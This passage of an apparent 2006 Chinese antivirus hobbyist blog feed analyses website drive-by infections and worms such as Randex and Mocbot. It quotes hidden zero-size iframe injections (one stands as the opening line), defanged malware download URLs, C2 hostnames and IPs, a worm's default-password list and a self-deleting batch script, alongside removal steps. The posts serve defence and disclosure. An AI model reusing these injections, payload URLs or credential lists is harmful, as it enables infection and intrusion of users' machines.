<iframe src='hxxp://www.68986.com/foot.htm' width='0' height='0' frameborder='0'></iframe>

 

hxxp://qq123943095.vicp.net/www1/user/3.exe 

BD96C556-65A3-11D0-983A-00C04FC29E36

winlogin.exe

 

 

]]>
Mon,11 Sep 2006 08:18:20 CST 0
<![CDATA[Trojan-Dropper.Win32.Delf.zb Unit.exe]]> .html 来源
hxxp://dl.itbulo.com/ShowSoftDown.asp?UrlID=2&SoftID=18337
安装脚本中有流氓软件安装
百度搜霸
极品数字网络电视
私人磁盘V3.95PRO
其他软件作品-->自动打开ms.htm,居然网络猪也在里头垃圾一堆
 
 
CODE:
安装脚本中有流氓软件安装,另外文件包中的Unit.exe卡巴报毒为:Trojan-Dropper.Win32.Delf.zb

安装脚本中有流氓软件安装
百度搜霸
极品数字网络电视
私人磁盘V3.95PRO
其他软件作品-->自动打开ms.htm,居然网络猪也在里头垃圾一堆


另外文件包中的Unit.exe卡巴报毒为:Trojan-Dropper.Win32.Delf.zb
[Run]
Filename: "{app}\Unit.exe";
Filename: "{app}\baidu.exe"; Description: "安装 上网辅助软件 - 百度搜霸(最强大的搜

索工具,如不安装请取消选择)";
Filename: "{app}\ACpass.exe"; Description: "{cm:LaunchProgram,Access数据库密码破解器

}";
从以上Run项可以看出本软件包作者,是让安装者先执行:Unit.exe、baidu.exe,可以定为流氓



创建注册项:
SOFTWARE\msadx
SOFTWARE\Classes\CLSID\{5ABC9058-B89D-4DE8-A060-A586EA168798}
SOFTWARE\Classes\CLSID\{5ABC9058-B89D-4DE8-A060-A586EA168798}\InProcServer32

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
{5EED7056-B89D-4DE8-A060-D285EA746799}
{5EED7056-B89D-4DE8-A060-D285EA746798}
{5EED7056-B89D-4DE8-A060-D285EA746797}
{5EED7056-B89D-4DE8-A060-D285EA746796}
{5EED7056-B89D-4DE8-A060-D285EA746795}
]]>
Tue,05 Sep 2006 13:33:08 CST 0
<![CDATA[v20060903.rar类的最近N多,版本更新也特快,感染范围还挺大]]> .html v20060903.rar

文件大小:31,744字节
UPX壳
CRC32:0A82165F
MD5:F0DDB3C4DF224102521DE9E203177169
来源:hxxp://down.ssdlh.com/v20060903.rar

瑞星报毒为:Trojan.DL.Agent.lkm
卡巴报毒为:Trojan-Downloader.Win32.Agent.aqr

开始对QQ文件夹动手

 

处理方法:

 

一、终止以下进程:

[explorer.exe]CommandLine = C:\WINDOWS\Explorer.EXE
[Messenger.exe]CommandLine = "C:\Program Files\Tencent\QQ\Messenger.exe"

二、在新建运行里重启动explorer.exe

三、然后修复如下项目:

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page=http://7b.com.cn/
O1 - Hosts: 127.0.0.1 localhost
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [Messenger.exe] C:\Program Files\Tencent\QQ\Messenger.exe
O4 - HKLM\..\Run: [Realplayer.exe] C:\Program Files\Tencent\QQ\Messenger.exe
O4 - HKLM\..\Run: [Messager.exe] C:\Program Files\Tencent\QQ\Messenger.exe
O18 - Filter : text/html - {0EB00690-8FA1-11D3-96C7-829E3EA50C29} - C:\WINDOWS\system32\Maxthonz.dll
有可能存在如下项目一并修复之(若没有就不用处理下面的了)
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="hxxp://www.7b.com.cn"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RunDown\info]
"vvad"="1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft NT\Windows\CurrentVersion\Winlogon]
"Shell"="Explorer.exe %System%\Messenger.exe"

四、删除病毒文件:

C:\Program Files\Tencent\QQ\Messenger.exe
C:\Program Files\Tencent\QQ\RTraveler.dll

C:\WINDOWS\system32\Maxthonz.dll
C:\WINDOWS\ghkzooo.bat
C:\WINDOWS\gafsdaz.bat

五、修复主页

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]

 

TKABC专杀工具:http://space.uwants.com/batch.download.php?aid=86320

使用前,关闭所有浏览器。

]]>
Tue,05 Sep 2006 09:37:02 CST 0
<![CDATA[网站被挂wm.htm出现的比较多]]> .html 软件下载页面

hxxp://xxx.tianshigm.com/ViewDownInfo.asp?ID=23067

中有如下代码插入:


CODE:
src="hxxp://xxx.7758mm.cn/wm.htm" width=0 height=0>
[Copy to clipboard]

 

下载:hxxp://xxx.7758mm.cn/tanip/tan.exe


IE图标

UPX壳

文件大小:22,016字节

CRC32:5FE149B0

MD5:1A6E5BDCBBD484BFD2F62B11995401C0

瑞星报毒为:Trojan.DL.Agent.ldq

卡巴报毒为:Trojan-Dropper.Win32.Agent.atp

tan.exe
尝试调用IE
生成Deleteme.bat尝试删除自身
并生成
Downexe.exe
Downdll.dll

]]>
Tue,05 Sep 2006 09:22:10 CST 0
<![CDATA[新博客我们一起学着用]]> .html
 
 

 

 看看有多少的新功能,挖吧……

 

我喜欢这样的宁静。。。。。。

 

 

 
博客网版权所有
]]>
Sat,02 Sep 2006 16:22:27 CST 0
<![CDATA[[转载]8088 汇编跳转]]> .html 文章摘处:看雪学院
文章提交:风泽

第三节 8088 汇编跳转

一、状态寄存器

PSW(Program Flag)程序状态字寄存器,是一个16位寄存器,由条件码标志(flag)和控制标志构成,如下所示:

15
14
13
12
11
10
9
8
7
6
5
4
3
2
1
0
 
 
 
 
OF
DF
IF
TF
SF
ZF
 
AF
 
PF
 
CF


条件码:
①OF(Overflow Flag)溢出标志。溢出时为1,否则置0。
②SF(Sign Flag)符号标志。结果为负时置1,否则置0.
③ZF(Zero Flag)零标志,运算结果为0时ZF位置1,否则置0.
④CF(Carry Flag)进位标志,进位时置1,否则置0.
⑤AF(Auxiliary carry Flag)辅助进位标志,记录运算时第3位(半个字节)产生的进位置。有进位时1,否则置0.
⑥PF(Parity Flag)奇偶标志。结果操作数中1的个数为偶数时置1,否则置0.

控制标志位:
⑦DF(Direction Flag)方向标志,在串处理指令中控制信息的方向。
⑧IF(Interrupt Flag)中断标志。
⑨TF(Trap Flag)陷井标志。

二、 直接标志转移(8位寻址)

指令格式
机器码
测试条件
如...则转移
 
 
指令格式
机器码
测试条件
如...则转移
JC
72
C=1
有进位
JNS
79
S=0
正号
JNC
73
C=0
无进位
JO
70
O=1
有溢出
JZ/JE
74
Z=1
零/等于
JNO
71
O=0
无溢出
JNZ/JNE
75
Z=0
不为零/不等于
JP/JPE
7A
P=1
奇偶位为偶
JS
78
S=1
负号
JNP/IPO
7B
P=0
奇偶位为奇

三、间接标志转移(8位寻址)

指令格式
机器码
测试格式
如...则转移
JA/JNBE(比较无符号数)
77
C或Z=0
>  高于/不低于或等于
JAE/JNB(比较无符号数)
73
C=0
>=  高于或等于/不低于
JB/JNAE(比较无符号数)
72
C=1
<  低于/不高于或等于
JBE/JNA(比较无符号数)
76
C或Z=1
<=  低于或等于/不高于
JG/JNLE(比较带符号数)
7F
(S异或O)或Z=0
>  大于/不小于或等于
JGE/JNL(比较带符号数)
7D
S异或O=0
>=  大于或等于/不小于
JL/JNGE(比较带符号数)
7C
S异或O=1
<  小于/不大于或等于
JLE/JNG(比较带符号数)
7E
(S异或O)或Z=1
<=  小于或等于/不大于

四、无条件转移指令(fisheepfisheep@sohu.com)

操作码伪码指令含义
EB  cb
JMP rel8相对短跳转(8位),使rel8处的代码位下一条指令
E9  cw
JMP rel16相对跳转(16位),使rel16处的代码位下一条指令
FF  /4
JMP r/m16绝对跳转(16位),下一指令地址在r/m16中给出
FF  /4
JMP r/m32绝对跳转(32位),下一指令地址在r/m32中给出
EA  cb
JMP ptr16:16远距离绝对跳转, 下一指令地址在操作数中
EA  cb
JMP ptr16:32远距离绝对跳转, 下一指令地址在操作数中
FF  /5
JMP m16:16远距离绝对跳转, 下一指令地址在内存m16:16中
FF  /5
JMP m16:32远距离绝对跳转, 下一指令地址在内存m16:32中

五、16位/32位寻址方式(fisheepfisheep@sohu.com)

操作码
伪码指令
跳转含义
跳转类型
跳转的条件(标志位)
0F 87  cw/cd
JA rel16/32
大于
near
(CF=0 and ZF=0)
0F 83  cw/cd
JAE rel16/32
大于等于
near
(CF=0)
0F 82  cw/cd
JB rel16/32
小于
near
(CF=1)
0F 86  cw/cd
JBE rel16/32
小于等于
near
(CF=1 or ZF=1)
0F 82  cw/cd
JC rel16/32
进位
near
(CF=1)
0F 84  cw/cd
JE rel16/32
等于
near
(ZF=1)
0F 84  cw/cd
JZ rel16/32
为0
near
(ZF=1)
0F 8F  cw/cd
JG rel16/32
大于
near
(ZF=0 and SF=OF)
0F 8D  cw/cd
JGE rel16/32
大于等于
near
(SF=OF)
0F 8C  cw/cd
JL rel16/32
小于
near
(SF<>OF)
0F 8E  cw/cd
JLE rel16/32
小于等于
near
(ZF=1 or SF<>OF)
0F 86  cw/cd
JNA rel16/32
不大于
near
(CF=1 or ZF=1)
0F 82  cw/cd
JNAE rel16/32
不大于等于
near
(CF=1)
0F 83  cw/cd
JNB rel16/32
不小于
near
(CF=0)
0F 87  cw/cd
JNBE rel16/32
不小于等于
near
(CF=0 and ZF=0)
0F 83  cw/cd
JNC rel16/32
不进位
near
(CF=0)
0F 85  cw/cd
JNE rel16/32
不等于
near
(ZF=0)
0F 8E  cw/cd
JNG rel16/32
不大于
near
(ZF=1 or SF<>OF)
0F 8C  cw/cd
JNGE rel16/32
不大于等于
near
(SF<>OF)
0F 8D  cw/cd
JNL rel16/32
不小于
near
(SF=OF)
0F 8F  cw/cd
JNLE rel16/32
不小于等于
near
(ZF=0 and SF=OF)
0F 81  cw/cd
JNO rel16/32
未溢出
near
(OF=0)
0F 8B  cw/cd
JNP rel16/32
不是偶数
near
(PF=0)
0F 89  cw/cd
JNS rel16/32
非负数
near
(SF=0)
0F 85  cw/cd
JNZ rel16/32
非零(不等于)
near
(ZF=0)
0F 80  cw/cd
JO rel16/32
溢出
near
(OF=1)
0F 8A  cw/cd
JP rel16/32
偶数
near
(PF=1)
0F 8A  cw/cd
JPE rel16/32
偶数
near
(PF=1)
0F 8B  cw/cd
JPO rel16/32
奇数
near
(PF=0)
0F 88  cw/cd
JS rel16/32
负数
near
(SF=1)
0F 84  cw/cd
JZ rel16/32
为零(等于)
near
(ZF=1)

注:一些指令操作数的含义说明:
  rel8      表示 8 位相对地址
  rel16    表示 16 位相对地址
  rel16/32  表示 16或32 位相对地址
  r/m16    表示16位寄存器
  r/m32    表示32位寄存器

]]>
Sat,26 Aug 2006 08:31:29 CST 0
<![CDATA[钟爱美眉贴图网的恶意脚本]]> .html 钟爱美眉贴图网

hxxp://www.z213.com/z213/
网站底部有这个脚本
hxxp://www.23597.com/pc/css.js


创建表项如下
clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
g0ld.com


HKEY_CLASSES_ROOT\CLSID\{F084FD46-EB63-4CC0-B814-99C16EE76BD1}\
InProcServer32="C:\\Program Files\\Common Files\\Microsoft Shared\\MSINFO\\InfoMz.Ime"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
"{F084FD46-EB63-4CC0-B814-99C16EE76BD1}"=""

此脚本下载执行如下文件
hxxp://www.23597.com/pc/ms.exe
大小:10,240 字节
CRC32:4A2A2584
MD:197534504B4DE5A55479BD757F9FB27C
ASPack 2.12 -> Alexey Solodovnikov
文件信息如下
Version Information
====================
Operating System           : 32-bit Windows
File Type                  : Application
File Sub-Type              : Unknown
File Version               : 1,0,0,0
Product Version            : 1,0,0,0
============================================================
Product Name               : 免杀
File Version               : 1.00
Product Version            : 1.00
Company Name               : aaaa
Internal Name              : ms
Original FileName          : ms.exe

创建如下键
CLSID {E93AD7C1-C347-11D1-A3E2-00A0C90AEA82}


下载hxxp://www.23597.com/pc/ie.exe到c:\ie.exe

hxxp://www.23597.com/pc/ie.exe
大小:17,920 字节
CRC32:DB8BE872
MD:F815919EB48027E38CC5D33F28B329D7
ASPack 2.12 -> Alexey Solodovnikov
文件信息如下:
Version Information
====================
Operating System           : 32-bit Windows
File Type                  : Application
File Sub-Type              : Unknown
File Version               : 1,0,0,0
Product Version            : 1,0,0,0
============================================================
Product Name               : Microsoft Windows
File Description           : Microsoft Windows
File Version               : 1.00
Product Version            : 1.00
Company Name               : Microsoft Windows
Internal Name              : IE
Legal Copyright            : Microsoft Windows
Original FileName          : IE.exe


hxxp://www.23597.com/pc/adiepage.txt
hxxp://www.23597.com/pc/adlist.txt
    追加列表如下:
    hxxp://www.z2e3.com/z2e3/8172.htm
    hxxp://www.bfz2e3.com/z2e3/81nc7clink999536.asp
    hxxp://www.bfz2e3.com/z2e3/7town1.asp
    hxxp://www.z2e3.com/z2e3/tc.htm
    hxxp://www.z2e3.com/z2e3/8173.htm
    hxxp://7clink.com/code/list0.asp?username=z213
    hxxp://www.z2e3.com/z2e3/817.htm
hxxp://mm.ok925.com/isi686822.htm
hxxp://www.bfz2e3.com/z2e3/7town2.asp
hxxp://www.bfz2e3.com/z2e3/7town3.asp
hxxp://www.bfz2e3.com/z2e3/7town4.asp
hxxp://www.bfz2e3.com/DHC.asp

hxxp://www.23597.com/pc/adset.txt
hxxp://www.23597.com/pc/ieFavorites.txt
    追加“精品影视网”,地址为hxxp://www.259333.com
hxxp://www.23597.com/pc/MMResult.asp

创建:
%WinDir%\killme.bat
%WinDir%\rundll32.exe
CLSID {FCFB3D23-A0FA-1068-A738-08002B3371B5}
CLSID {E93AD7C1-C347-11D1-A3E2-00A0C90AEA82}
修改键值:
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Internet Explorer\Main
Software\Policies\Microsoft\Internet Explorer\Control Panel

最后执行:killme.bat
文件内容为:
@echo off
sleep 100
del ie.exe
del killme.bat
cls
exit

]]>
Fri,25 Aug 2006 10:07:09 CST 0
<![CDATA[某省广播电视大学远程素质教育论坛被挂毒]]> .html 针对两漏洞:

Exploit.JS.ADODB.Stream.e

Exploit.HTML.Mht

http://xxx.qr.com/gq/wm.htm
Oh,my god!   Goldsun[at]84823714
 You DO it!

下载http://xxx.qr.com/mc/gq.exe

文件大小:187392 bytes

CRC32:FB7AEDD3
MD5:5548FBF00DC60706C23D52A35AF48559
MD5 hash:5548fbf00dc60706c23d52a35af48559.
创建文件如下:
C:\WINDOWS\TEMP\7309.exe
C:\WINDOWS\TEMP\7310.exe
C:\WINDOWS\TEMP\7311.exe
C:\WINDOWS\TEMP\7312.exe

瑞星报毒Dropper.Delf.bch
BitDefender  Found MemScan:Trojan.PWS.Qqrob.EA 
NOD32  Found a variant of Win32/TrojanDownloader.Agent.PD 
VBA32  Found Trojan-Downloader.Agent.27 (probable variant)


同时下载脚本
http://xxx.qr.com/gq/ah.js
http://xxx.qr.com/jp/jp.html

]]>
Thu,24 Aug 2006 13:45:24 CST 0
<![CDATA[XX电大教育工会网站被挂病毒]]> .html 今日偶然浏览“XX电大教育工会”网站,发现被挂病毒链接

利用Exploit.JS.ADODB.Stream漏洞

脚本下载:hxxp://xxxxxx.cnicb.com/11/du.exe

目前国内软件未查杀

Antivirus Version Update Result
AntiVir 6.35.1.3 08.23.2006 HEUR/Trojan.Downloader
Authentium 4.93.8 08.24.2006  no virus found
Avast 4.7.844.0 08.23.2006  no virus found
AVG 386 08.23.2006  no virus found
BitDefender 7.2 08.24.2006 BehavesLike:Trojan.Downloader
CAT-QuickHeal 8.00 08.23.2006  no virus found
ClamAV devel-20060426 08.24.2006  no virus found
DrWeb 4.33 08.23.2006 DLOADER.Trojan
eTrust-InoculateIT 23.72.105 08.24.2006  no virus found
eTrust-Vet 30.3.3035 08.23.2006  no virus found
Ewido 4.0 08.23.2006  no virus found
Fortinet 2.77.0.0 08.23.2006  no virus found
F-Prot 3.16f 08.23.2006  no virus found
F-Prot4 4.2.1.29 08.24.2006  no virus found
Ikarus 0.2.65.0 08.24.2006  no virus found
Kaspersky 4.0.2.24 08.24.2006  no virus found
McAfee 4836 08.23.2006  no virus found
Microsoft 1.1560 08.24.2006  no virus found
NOD32v2 1.1722 08.23.2006 probably a variant of Win32/TrojanDownloader.Dadobra.FX 
Norman 5.90.23 08.23.2006  no virus found
Panda 9.0.0.4 08.23.2006 Suspicious file
Sophos 4.08.0 08.24.2006  no virus found
Symantec 8.0 08.23.2006  no virus found
TheHacker 5.9.8.198 08.23.2006  no virus found
UNA 1.83 08.23.2006  no virus found
VBA32 3.11.0 08.23.2006  no virus found
VirusBuster 4.3.7:9 08.23.2006  no virus found


Aditional Information
File size: 18497 bytes
MD5: bee0c22702c4c61b887f5d49a2779f2d
SHA1: cb59c839a4989a22d6c97bc0693254b651b3c78a
CRC32:5150DAF3

创建:C:\Program Files\Internet Explorer\explorer.exe

下载
http://xxxxxx.cnicb.com/11/test.exe


MD5 hash: 72f92bee13bdb5661b1f093feeb04218

盗号

CLSID {8856F961-340A-11D0-A96B-00C04FD705A2}.

]]>
Thu,24 Aug 2006 10:41:56 CST 0
<![CDATA[瑞星杀毒软件2007 / 瑞星个人防火墙2007 - 公开测试]]> .html 瑞星杀毒软件2007 / 瑞星个人防火墙2007 - 公开测试

http://www.ikaka.com/2007/index.htm

开始时间:2006年8月23日
测试对象:

  1. “瑞星杀毒软件2007”测试版
  2. “瑞星个人防火墙2007”测试版
  3. 瑞星杀毒软件“2006版”跨版本升级测试(暂缓测试)
  4. 测试版“产品序列号”:MI0TMS-5KG75M-QDDLS0-1VE200
    测试版“用户ID”:7AHRR6LPN34G

测试版下载地址:
  1. “瑞星杀毒软件2007”测试版 http://www.ikaka.com/2007/down.asp?t=rav
    发布日期 2006.08.23   版本号:19.02.20  大小:39.7M
  2. “瑞星个人防火墙2007”测试版 http://www.ikaka.com/2007/down.asp?t=rfw
    发布日期 2006.08.23   版本号:19.02.20  大小:9.11M

小提示:如果您下载速度极慢,建议您用网络下载工具“网络蚂蚁[NetAnts]”、“网际快车[Flashget]”等软件进行下载。

测试结果提交:
点击瑞星杀毒软件主程序界面中的“专家门诊”按钮
程序会自动连接到瑞星网站的公开测试页面,也就是本页面
点击“填写公测表单”按钮,按照表单中的项目要求填写并“提交”。
注意事项:
  1. 安装测试版本之前,请先卸载以前的版本,并重新启动计算机。建议不要同时与其它杀毒软件安装在同一台计算机的同一个操作系统中。
  2. 测试版中的“用户注册向导”无法通过属正常情况,并非软件问题。
  3. 测试版将不定期更新版本,直至测试活动结束。更新采用两种方式进行“智能升级”和“手动升级”,采用“智能升级”时请点击杀毒软件界面中的“升级”或防火墙界面中的“智能升级”按钮进行,采用“手动升级”时每次下载新版本的测试版安装包后,需要卸载以前的版本然后重新安装。
  4. 测试完成后,若您不再需要进行进一步测试,请务必卸载“瑞星杀毒软件2007”测试版及“瑞星个人防火墙2007”测试版,以免影响您安装正式版本或给您的计算机使用带来不便。
公开测试声明:
  1. 本次公开测试采取自愿参加的原则,瑞星公司不主动邀请、不强迫任何人以任何形式参加此次测试活动。
  2. 测试阶段的软件产品存在不完善性,有可能会导致计算机出现异常的情况而造成损失,希望广大计算机用户在测试前做好系统及数据备份。对于由于出现异常而造成的损失,北京瑞星科技股份有限公司概不负责,亦不承担任何法律责任。
  3. 本次活动的最终解释权归北京瑞星科技股份有限公司所有。
测试奖励:

    对于此次公测活动,瑞星公司将在本次公开测试结束后,从为该软件的完善做出实质贡献的参测人员中选出481名给予不同程度的奖励。获奖名单将在测试活动结束后择日公布。

奖项人数奖品设置
最佳测试奖1名将获得现金5000元大奖(中奖者偶然所得税自理并由瑞星公司代扣代缴)
突出贡献奖30名每人将获得“华为3COM BR104 家庭路由器”一台
火眼金睛奖50名每人将获得“笔记本电脑包”一个
优秀建议奖100名每人将获得“豪华版卡卡狮子”(毛绒玩具)一个
积极参与奖300名每人将获得“瑞星杀毒防火墙组合版(季卡)”(虚拟卡)
]]>
Wed,23 Aug 2006 15:18:40 CST 0
<![CDATA[值得注意的蠕虫bot]]> .html 值得注意的蠕虫

1. Symantec: W32.Randex.GEL

2. Mcafee: W32/Sdbot.worm!MS06-040

3. Sophos: W32/Vanebot-A

4. Kingsoft Duba: Worm.VaneBot.a

以下是 Symantec方面的资料

When W32.Randex.GEL is executed, it performs the following actions:

  1. Creates the following file:

    %System%\javanet.exe

  2. Adds the value:

    "MS Java for Windows XP & NT" = "javanet.exe"

    to the registry subkeys:

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices


    so that the worm starts when Windows starts.

  3. Adds the values:

    "Shell" = "Explorer.exe javanet.exe"
    "Userinit" = "%System%\userinit.exe,javanet.exe"

    to the registry subkey:

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windlogon

    so that the worm starts when Windows starts.

  4. Adds the value:

    "JavaNet" = "rBot v2 a.k.a. the next generation (working on winXP SP2)"

    to the registry subkey:

    HKEY_CURRENT_USER\Software\Microsoft\Windows

  5. Modifies the value:

    "EnableDCOM" = "N"

    in the registry subkey:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole

    which disables DCOM on the compromised computer.

  6. Modifies the value:

    "restrictanonymous" = "1"

    in the registry subkey:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

    which prevents NULL session enumeration of the host.

  7. Modifies the value:

    "Start" = "4"

    in the registry subkeys:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv


  8. Attempts to steal information entered into browser windows with the following URL:

    e-gold.com[REMOVED]

  9. Opens a back door on the compromised computer, connecting to the forum.ednet.es IRC server on TCP port 4915.

  10. Listens for commands, which may allow a remote attacker to perform some of the following actions on the compromised computer:
    • Download and execute files
    • List, stop, and start processes and threads
    • Launch SYN, UDP and HTTP denial of service attack
    • Open a command shell on the compromised computer
    • Start a SOCKS4 proxy server
    • Log keystrokes

  11. Uses MSN Messenger, Yahoo Messenger, AOL Instant Messenger and ICQ to spread.

  12. Copies itself to network shares and Microsoft SQL servers, using the following list of usernames and passwords:

    User names:
    • admin
    • root
    • asdfgh
    • server
    • 0
    • 00
    • 000
    • 0000
    • 00000
    • 000000
    • 0000000
    • 00000000
    • 1
    • 12
    • 123
    • 1234
    • 12345
    • 123456
    • 1234567
    • 12345678
    • 123456789
    • secret
    • secure
    • security

      Passwords:
    • setup
    • shadow
    • shit
    • sql
    • super
    • sys
    • system
    • abc
    • abc123
    • access
    • adm
    • alpha
    • anon
    • anonymous
    • backdoor
    • backup
    • beta
    • bin
    • coffee
    • computer
    • crew
    • database
    • debug
    • default
    • demo
    • free
    • go
    • guest
    • hello
    • install
    • internet
    • login
    • mail
    • manager
    • money
    • monitor
    • network
    • new
    • newpass
    • nick
    • nobody
    • nopass
    • one
    • oracle
    • pass
    • passwd
    • password
    • poiuytre
    • private
    • pub
    • public
    • qwerty
    • random
    • real
    • remote
    • ruler
    • telnet
    • temp
    • test
    • test1
    • test2
    • visitor
    • web
    • windows

  13. Spreads to other computers by exploiting one or more the following vulnerabilities:

]]>
Wed,23 Aug 2006 12:45:07 CST 0
<![CDATA[SMSS.EXE OR LSASS.EXE OR WINLOGON处理、修复方法]]> .html 本病毒感染的主要特点是,关联多处被改写,才导致许多正常程序不能使用


修复方法:

1、强制终止假冒系统进程WINLOGON(LSASS、SMSS)这点很重要;


2、导入附件注册表修复文件,然后用你的杀毒软件查杀干净病毒,就基本可以与些病毒告别了。


修复文件内容:http://kvirus.bokee.com/5534013.html

以上是在我的XP系统上解决处理的。

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"

[HKEY_CLASSES_ROOT\.lnk\ShellNew]
"Command"="rundll32.exe appwiz.cpl,NewLinkHere %1"

[HKEY_CLASSES_ROOT\Applications\iexplore.exe\shell\open\command]
@="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" %1"

[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}

\shell\OpenHomePage\Command]
@="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\""

[HKEY_CLASSES_ROOT\cplfile\shell\cplopen\command]
@="rundll32.exe shell32.dll,Control_RunDLL \"%1\",%*"

[HKEY_CLASSES_ROOT\Drive\shell\find\command]
@="%SystemRoot%\\explorer.exe"

[HKEY_CLASSES_ROOT\dunfile\shell\open\command]
@="%SystemRoot%\\system32\\rundll32.exe NETSHELL.DLL,InvokeDunFile %1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ftp\shell\open\command]
@=""C:\Program Files\Internet Explorer\iexplore.exe" "

[HKEY_CLASSES_ROOT\htmlfile\shell\opennew\command]
@="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" %1"

[HKEY_CLASSES_ROOT\HTTP\shell\open\command]
@="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" %1"

[HKEY_CLASSES_ROOT\inffile\shell\Install\command]
@="%SystemRoot%\\System32\\rundll32.exe setupapi,InstallHinfSection DefaultInstall

132 %1"

[HKEY_CLASSES_ROOT\InternetShortcut\shell\open\command]
@="find.exe ieframe.dll,OpenURL %l"

[HKEY_CLASSES_ROOT\scrfile\shell\install\command]
@="find.exe desk.cpl,InstallScreenSaver %l"

[HKEY_CLASSES_ROOT\scriptletfile\Shell\Generate Typelib\command]
@="find.exe C:\\WINDOWS\\System32\\scrobj.dll,GenerateTypeLib \"%1\""

[HKEY_CLASSES_ROOT\telnet\shell\open\command]
@="find.exe url.dll,TelnetProtocolHandler %l"

[HKEY_CLASSES_ROOT\Unknown\shell\openas\command]
@=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1

[-HKEY_CLASSES_ROOT\winfiles\Shell\Open\Command]

[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet]
@="iexplore.exe"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\iexplore.pif]


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"TProgram"=-
"Torjan Program"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe"
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,"

]]> Tue,15 Aug 2006 20:52:24 CST 0 <![CDATA[Free F-Secure Anti-Virus 2006 AND KAV 6.0]]> .html Free F-Secure Anti-Virus 2006 licenz till 15.07.2007 [CHIP 08/06]


The German 'Chip' is giving away free F-Secure Anti-Virus 2006 licenses.

You get the licens here for free:
http://www.f-secure.de/chip

It's in German but i think it is easy to understand, but here a translation German - English

Ihre E-Mail Adresse - Your email Adress
Anrede: Herr - Mr.; Frau - Mrs.
Ihr Vorname - First Name
Ihr Nachname - Last name

Than klick on 'Daten senden' and the licens will be send to your e-mail.

AOL Active virus Shield(KAV 6.0) FREE!!!!!

I just went to download.com and saw this shocker Kaspersky's AV 6.0 is being dubbed as Aol Active virus shield and provided free....

www.activevirusshield.com
And as posted in the post about security suite,its not limited to aol users its free for everyone       
Download.Com-http://www.download.com/AOL-Active-V...ml?tag=sptlt_s

]]>
Mon,14 Aug 2006 09:00:13 CST 0
<![CDATA[蠕虫“魔波”(SVCHOST.EXE崩溃)新闻]]> .html 据某外国网站介绍 今天 截获了一个利用 MS06-040 漏洞的蠕虫病毒 并且主要攻击 win200系统
该病毒 在系统文件夹下释放 wgareg.exe 和wgavm.exe文件
该蠕虫会在系统中建立如下服务
服务名称 wgareg
服务描述 Windows Genuine Advantage Registration Service (windows正版 验证 服务)
描述 Ensures that your copy of Microsoft Windows is genuine and registered. Stopping or disabling this service will result in system instability.

服务名称 wgavm
服务描述 Windows Genuine Advantage Validation Monitor
具体描述 Ensures that your copy of Microsoft Windows is genuine. Stopping or disabling this service will result in system instability..
可以看出来 是伪装 windows正版 验证的蠕虫
并且病毒会自动使用TCP 18067端口 连接bbjj.househot.com ypgw.wallloan.com

由于此病毒来势汹汹 所以发布病毒预警!解决办法 赶快打上 MS06-040 补丁

从目前情况看,还大量感染了XP系统。警惕啊。

The bot connects to a specified channel and awaits commands, including:

DDoS Scan (for vulnerable systems) Download / execute remote filesOnce instructed, the bot scans the class A subnet addresses, sending SYN packets via TCP 139 (netbios), and 445 (microsoft-ds), looking for systems vulnerable to the MS06-040 vulnerability.  When a vulnerable system is discovered, the infected host causes a buffer overflow to occur on the remote system, instructing it to download Mocbot, save it to the WINDOWS SYSTEM directory as a file named .exe and then execute it.  Unlike many exploiting bots, Mocbot doesn't use FTP or TFTP to achieve the downloading, but rather contains its own downloader code.  The remote system downloads the worm via a random TCP port..


The hard-coded command and control servers are:

bniu.househot.com
ypgw.wallloan.com
The IP addresses currently pointed to by these hostnames are:

58.81.137.157
61.163.231.115
61.189.243.240
202.121.199.200
211.154.135.30
218.61.146.86

大家赶快去WINDOWSUPDATE吧。。。

Microsoft 安全公告 MS06-040  Server 服务中的漏洞可能允许远程执行代码 (921883)

http://www.microsoft.com/china/technet/Security/bulletin/ms06-040.mspx

]]>
Mon,14 Aug 2006 08:57:39 CST 0
<![CDATA[Mocbot今天再次爆发,SVCHOST.EXE应用程序发生错误]]> .html
CISRT消息:
Chinese Internet Security Response Team
Mocbot.b,利用MS06-040漏洞的蠕虫出现了,距离MS06-040补丁发布五天,和去年的Zotob的现身速度差不多。

从我目前收集到的资料来看,这次出现的两个变种,都是从原来利用MS05-039漏洞的Mocbot更新而来的,将原来利用MS05-039漏洞的攻击部分替换成了MS06-040攻击代码。病毒作者是我们国人,会通过18067端口连接IRC服务器:

引用
